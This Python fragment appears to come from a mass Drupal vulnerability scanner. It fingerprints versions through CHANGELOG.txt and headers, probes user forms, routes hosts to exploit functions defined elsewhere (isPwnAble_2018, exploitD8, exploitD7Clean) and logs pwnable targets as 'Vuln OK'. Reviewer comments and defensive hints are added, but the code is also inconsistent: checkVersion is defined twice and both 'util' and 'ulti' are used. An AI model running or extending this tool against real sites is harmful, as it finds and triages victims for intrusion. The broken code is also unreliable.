def checkVersion(host):
    """Return the first release line of a host's Drupal CHANGELOG.txt, or "N/A".

    A POST is sent to ``<host>/CHANGELOG.txt`` and, when that does not answer
    with status 200, to ``<host>/core/CHANGELOG.txt``. The body is treated as
    a changelog only if it contains the marker "Drupal 1.0.0, 2001-01-15" and
    neither spelling of the HTML doctype. Any exception raised while
    requesting yields "N/A".

    On the server side this appears as a POST to a static text file, which
    ordinary browsing does not produce. Removing CHANGELOG.txt or denying
    access to it takes this version signal away.
    """
    request_headers = util.genHeader()
    request_timeout = 1
    try:
        # verify=False switches off TLS certificate validation, so the body
        # can come from anyone on the network path; the reported version is a
        # hint, not an authenticated fact.
        response = requests.post(host + "/CHANGELOG.txt", verify=False,
                                 headers=request_headers, timeout=request_timeout)
        if response.status_code != 200:
            response = requests.post(host + "/core/CHANGELOG.txt", verify=False,
                                     headers=request_headers, timeout=request_timeout)
        body = response.text
    except Exception:
        return "N/A"

    looks_like_changelog = (
        "Drupal 1.0.0, 2001-01-15" in body
        and "<!doctype html>" not in body
        and "<!DOCTYPE html>" not in body
    )
    if not looks_like_changelog:
        return "N/A"

    # Scan from the top for the first line that names a release. Lines holding
    # "xxxx" (presumably the undated development entry) or "content=" (HTML
    # meta tags) are skipped.
    changelog_lines = response.text.split('\n')
    for entry in changelog_lines:
        if "Drupal" in entry and "xxxx" not in entry and "content=" not in entry:
            return entry
    # No line qualified: the last line is returned.
    return changelog_lines[-1]
def processRedirectedURL(url, version):
    """Classify a redirected URL and hand it to the matching follow-up check.

    Args:
        url: URL to inspect (presumably the redirect target reported by an
            earlier form check; confirm against the caller).
        version: Drupal major version as a string; only '7' and '8' are
            compared here.

    Returns:
        True when the URL contains 'profile=default'; otherwise whatever
        isPwnAbleWithQ, exploitD8 or exploitD7Clean return (all defined
        outside this block), or False.

    Raises:
        Exceptions from the final requests.get are not caught here.
    """
    headers = ulti.genHeader()
    # Both form paths are 14 characters long, which the [:-14] slice below relies on.
    form_id = '/user/password' if version[:1] == '7' else '/user/register'
    # NOTE(review): 'profile=default' looks like the installer redirect of a
    # site that has not been set up; it is reported as True with no further
    # request. Confirm this is the intended meaning.
    if ('profile=default' in url):
        return True
    # NOTE(review): `is` tests object identity, not equality. Whether a str
    # equal to '8' or '7' is the same object as the literal is an interpreter
    # detail, and CPython 3.8+ emits a SyntaxWarning for this form.
    if('?q=' in url and version is '8'):
        return False
    if('?q=user/password' in url and version is '7'):
        # Drops the last 16 characters, the length of '?q=user/password';
        # assumes the URL ends with that suffix.
        url = url[:-16]
        return isPwnAbleWithQ(url)
    if(form_id in url):
        # Drops the last 14 characters; assumes the URL ends with form_id.
        url = url[:-14]
        if(version is '8'):
            return exploitD8(url)
        elif(version is '7'):
            return exploitD7Clean(url)
        else:
            return False
    # The response does not affect the result: both paths below return False.
    res = requests.get(url, headers=headers, timeout=5)
    if ('user_pass' not in res.text and 'user_form' not in res.text):
        # The original call to isVuln(url, version) is commented out here.
        return False
    return False
def checkHeader(host):
    """Guess the Drupal major version from a host's response headers.

    Sends one GET to ``host`` and searches the string form of the response
    headers for "Drupal 7" or "Drupal 8" (typically exposed through a
    generator-style header such as X-Generator). A match counts only when
    the status code is 200.

    Returns "Drupal 7.xx", "Drupal 8.xx" or "N/A". Request errors are printed
    and reported as "N/A". Stripping the generator header at the web server
    or proxy removes this signal.
    """
    request_headers = util.genHeader()
    labels = (
        ('Drupal 7', "Drupal 7.xx"),
        ('Drupal 8', "Drupal 8.xx"),
    )
    try:
        response = requests.get(host, headers=request_headers, timeout=2)
        for marker, label in labels:
            if marker in str(response.headers) and response.status_code == 200:
                return label
    except Exception as err:
        print(err)
        return "N/A"
    return "N/A"
def isURLCached(url):
    """Log a host to ``outputfile`` when its headers advertise Drupal 7 or 8.

    ``url`` is a bare host taken from input. It is stripped and requested
    over plain http://. For each marker found in the string form of the
    response headers, with a 200 status, one line "<url> Drupal N" is
    appended. The two markers are tested independently, so both lines can be
    written. Exceptions are printed and otherwise ignored.
    """
    request_headers = util.genHeader()
    target = url.strip()
    records = (
        ('Drupal 7', "%s Drupal 7\n"),
        ('Drupal 8', "%s Drupal 8\n"),
    )
    try:
        response = requests.get("http://" + target, headers=request_headers, timeout=5)
        for marker, line_format in records:
            if marker in str(response.headers) and response.status_code == 200:
                with open(outputfile, 'a') as out:
                    out.write(line_format % target)
    except Exception as err:
        print(err)
def isVulnerable(lines):
    """Run the form check and the follow-up check for one input record and log the outcome.

    Args:
        lines: One input record of the form "<host>|<version>". A record
            without "|" raises IndexError on the version lookup.

    The result is appended to ``outputfile`` (a name defined outside this
    block) as one of four record types: "Vuln OK", "Vuln Fail", "Form Fail"
    or "Redirected". Nothing is returned.
    """
    headers = ulti.genHeader()
    # The target is always built with plain http:// and a trailing slash.
    host = "http://" + lines.strip().split("|")[0] + "/"
    version = lines.strip().split("|")[1]
    # isFormValid is defined elsewhere. The branches below treat its result as
    # tri-state: True, False, or any other value (logged as a redirect).
    formValid = isFormValid(host, version, headers)
    if (formValid is True):
        # isPwnAble_2018 is defined elsewhere; only an exact True counts as a hit.
        isPwned = isPwnAble_2018(host, version, headers)
        # NOTE(review): under Python 3, "%s" applied to host.encode("utf-8")
        # writes the bytes repr (b'...') into the file; the same applies to
        # every write below. Confirm which interpreter this targets.
        if isPwned is True:
            with open(outputfile, 'a') as f:
                f.write("%s === Vuln OK === %s\n" % (host.encode("utf-8"), version))
        else:
            with open(outputfile, 'a') as f:
                f.write("%s === Vuln Fail ===\n" % host.encode("utf-8"))
    elif (formValid is False):
        with open(outputfile, 'a') as f:
            f.write("%s === Form Fail ===\n" % host.encode("utf-8"))
    else:
        # Any value other than True/False is written verbatim after "||"
        # (presumably the redirect target; verify against isFormValid).
        with open(outputfile, 'a') as f:
            f.write("%s === Redirected === || %s \n" % (host.encode("utf-8"), formValid))
def checkVersion(url):
    """Look up a host's Drupal release line in CHANGELOG.txt and append it to ``outputfile``.

    Args:
        url: Bare host taken from one line of the input file; it is stripped
            and prefixed with "http://".

    A POST is sent to /CHANGELOG.txt and, on a non-200 status, to
    /core/CHANGELOG.txt. Request errors leave ``data`` empty, so the
    changelog test below fails. Nothing is returned.

    NOTE(review): this block was recovered from a single collapsed line.
    Placing the file write inside the ``if`` is an assumption; confirm against
    the original layout.
    """
    # Get host as each line of input file
    host = "http://"+url.strip()
    # Per the original comment, genHeader supplies a random User-Agent header
    # (its implementation is outside this block).
    headers = util.genHeader()
    try:
        # Request CHANGELOG.txt of host. verify=False disables TLS certificate
        # validation, so the response is not authenticated.
        r = requests.post(host+"/CHANGELOG.txt", verify=False, headers=headers, timeout=1)
        # Case status code != 200
        if(r.status_code != 200):
            # Retry under /core/
            r = requests.post(
                host+"/core/CHANGELOG.txt", verify=False, headers=headers, timeout=1)
        # Get data
        data = r.text
    except Exception as e:
        # Any failure is swallowed; the empty string fails the marker test below.
        data = ""
    # Accept the body as a Drupal changelog only if it holds the 1.0.0 entry
    # and is not an HTML page.
    if "Drupal 1.0.0, 2001-01-15" in data and "<!doctype html>" not in data and "<!DOCTYPE html>" not in data:
        check = True
        sline = 0
        while check:
            try:
                # Take line number sline of the changelog; the text is
                # re-split on every pass.
                data = r.text.split('\n')[sline]
            except Exception as e:
                # Ran past the last line: stop, keeping the previous line in data.
                check = False
            # Stop at the first line naming a release; lines holding "xxxx"
            # or "content=" are skipped.
            if "Drupal" in data and "xxxx" not in data and "content=" not in data:
                check = False
            else:
                sline = sline+1
        # Concatenate host and version line into the result
        result = host+" "+data
        # Open output file in append mode
        with open(outputfile, 'a') as f:
            # NOTE(review): under Python 3, "%s" applied to bytes writes the
            # b'...' repr; confirm which interpreter this targets.
            f.write("%s\n" % result.encode("utf-8"))